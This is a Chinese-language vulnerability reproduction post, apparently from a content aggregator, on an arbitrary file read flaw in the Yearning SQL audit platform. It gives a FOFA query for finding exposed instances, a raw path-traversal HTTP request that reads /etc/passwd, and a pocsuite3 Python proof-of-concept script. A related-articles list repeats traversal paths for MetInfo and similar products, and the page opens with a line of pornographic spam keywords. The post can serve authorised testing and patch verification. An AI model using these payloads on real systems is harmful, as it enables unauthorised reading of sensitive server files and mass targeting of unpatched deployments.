国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本)

這篇具有很好參考價值的文章主要介紹了漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

免責聲明

文章中涉及的漏洞均已修復,敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任,一旦造成后果請自行負責

漏洞描述

Yearning是一款專業(yè)的SQL審核平臺,對MYSQL web端SQL數(shù)據(jù)庫進行審核的軟件!Yearning支持SQL查詢、SQL審核、推送、用戶權(quán)限及管理等功能,免費開源。該系統(tǒng)Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本和 Neptune 2.3.4 -2.3.6 版本存在任意文件讀取漏洞。攻擊者可以利用該漏洞獲取敏感信息。

漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本),安全,web安全

fofa語句

app="Yearning"

poc加檢測

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1

漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本),安全,web安全

poc腳本

腳本使用的pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2024/1/16
# @Author: 煉金術(shù)師諸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str


class yearning_front_fileread(POCBase):
    pocDesc = '''Yearning front 任意文件讀取漏洞'''
    author = '煉金術(shù)師諸葛亮'
    createDate = '2024-1-16'
    name = 'Yearning front 任意文件讀取漏洞'

    def _verify(self):

        result = {}
        url = self.url + '/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Accept-Encoding': 'gzip, deflate',
            'Upgrade-Insecure-Requests': '1',
            "Connection": "close"
        }



        try:

            response = requests.get(url, headers=headers)
            if response.status_code == 200 and 'root' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass


register_poc(yearning_front_fileread)

腳本利用

漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本),安全,web安全文章來源地址http://www.zghlxwxcb.cn/news/detail-799990.html

到了這里,關(guān)于漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • Jenkins CLI 任意文件讀取漏洞復現(xiàn)

    Jenkins CLI 任意文件讀取漏洞復現(xiàn)

    Jenkins CLI 是 Jenkins 內(nèi)置的命令行頁面。 Jenkins 受影響版本中使用 args4j 庫解析CLI命令參數(shù),該庫默認將參數(shù)中 @ 字符后的文件路徑替換為文件內(nèi)容,未授權(quán)的攻擊者可利用該特性使用 Jenkins 控制器進程的默認字符編碼讀取 Jenkins 控制器文件系統(tǒng)上的任意文件(如加密密鑰的二進

    2024年02月22日
    瀏覽(26)
  • OfficeWeb365 Indexs 任意文件讀取漏洞復現(xiàn)

    OfficeWeb365 Indexs 任意文件讀取漏洞復現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預覽及PDF文檔在線預覽云服務,包括 Microsoft Word 文檔在線預覽、Excel 表格在線預覽、Powerpoint 演示文檔在線預覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預覽。 OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨特

    2024年02月03日
    瀏覽(38)
  • Metinfo6.0.0任意文件讀取漏洞復現(xiàn)

    Metinfo6.0.0任意文件讀取漏洞復現(xiàn)

    漏洞原理 在MetInfo6.0.0appsystemincludemodule的old_thumb.class.php文件 可以看到這里對./進行了嚴格的過濾,但是卻忽略了在Windows下還可以用…來跳轉(zhuǎn)目錄 環(huán)境搭建 下載Metinfo6.0.0 配置隨便寫,自己記住就行 這里前面已經(jīng)審計過代碼了,就直接上payload了 http://10.9.75.161/MetInfo6.0.0

    2024年02月10日
    瀏覽(17)
  • Metinfo6.0.0任意文件讀取【漏洞復現(xiàn)】

    Metinfo6.0.0任意文件讀取【漏洞復現(xiàn)】

    1.1、漏洞描述 漏洞名稱:MetInfo任意文件讀取 漏洞簡介:MetInfo是一套使用PHP和MySQL開發(fā)的內(nèi)容管理系統(tǒng),其中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件讀取漏洞,攻擊者可利用該漏洞讀取網(wǎng)站的敏感文件。 下載地址:歷史版本安裝文件下載 Ver_6.0.0 1.2、漏洞等

    2024年02月10日
    瀏覽(20)
  • metinfo_6.0.0 任意文件讀取漏洞復現(xiàn)

    metinfo_6.0.0 任意文件讀取漏洞復現(xiàn)

    漏洞點為/include/thumb.php 一測: /include/thumb.php?dir=..././http/..././config/config_db.php 二測: /include/thumb.php?dir=.....///http/.....///config/config_db.php 三測: /include/thumb.php?dir=http/.....///.....///config/config_db.php 四測: /include/thumb.php?dir=http....configconfig_db.php 注意: 此POC?僅適用于Windows?系統(tǒng)

    2024年01月20日
    瀏覽(22)
  • officeWeb365 Indexs接口存在任意文件讀取漏洞復現(xiàn)

    officeWeb365 Indexs接口存在任意文件讀取漏洞復現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預覽及PDF文檔在線預覽云服務,包括 Microsoft Word 文檔在線預覽、Excel 表格在線預覽、Powerpoint 演示文檔在線預覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預覽。OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨特

    2024年02月20日
    瀏覽(28)
  • 用友NC word.docx 任意文件讀取漏洞復現(xiàn)

    用友NC word.docx 任意文件讀取漏洞復現(xiàn)

    ?用友NC是一款企業(yè)級ERP軟件。作為一種信息化管理工具,用友NC提供了一系列業(yè)務管理模塊,包括財務會計、采購管理、銷售管理、物料管理、生產(chǎn)計劃和人力資源管理等,幫助企業(yè)實現(xiàn)數(shù)字化轉(zhuǎn)型和高效管理。 用友NC 系統(tǒng)word.docx等接口存在任意文件讀取漏洞,未經(jīng)身份認證

    2024年01月25日
    瀏覽(22)
  • IP-guard WebServer 任意文件讀取漏洞復現(xiàn)

    IP-guard WebServer 任意文件讀取漏洞復現(xiàn)

    ?IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護終端設備安全、數(shù)據(jù)安全、管理網(wǎng)絡使用和簡化IT系統(tǒng)管理。 由于IP-guard WebServer?/ipg/static/appr/lib/flexpaper/php/view.php接口處未對用戶輸入的數(shù)據(jù)進行嚴格的校驗和過濾。未經(jīng)身份驗證的攻擊者可

    2024年04月12日
    瀏覽(19)
  • 惠爾頓 網(wǎng)絡安全審計系統(tǒng) 任意文件讀取漏洞復現(xiàn)

    惠爾頓 網(wǎng)絡安全審計系統(tǒng) 任意文件讀取漏洞復現(xiàn)

    惠爾頓網(wǎng)絡安全審計產(chǎn)品致力于滿足軍工四證、軍工保密室建設、國家涉密網(wǎng)絡建設的審計要求,規(guī)范網(wǎng)絡行為,滿足國家的規(guī)范;支持1-3線路的internet接入、1-3對網(wǎng)橋;含強大的上網(wǎng)行為管理、審計、監(jiān)控模塊;用戶訪問功能,內(nèi)容過濾功能;流量控制功能、帶寬管理功能

    2024年02月22日
    瀏覽(28)
  • 【漏洞復現(xiàn)】泛微e-office OfficeServer2.php 存在任意文件讀取漏洞復現(xiàn)

    泛微e-office OfficeServer2.php 存在任意文件讀取漏洞,攻擊者可通過構(gòu)造特定Payload獲取敏感數(shù)據(jù)信息。 請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責,所產(chǎn)生的一切不良后果

    2024年02月09日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包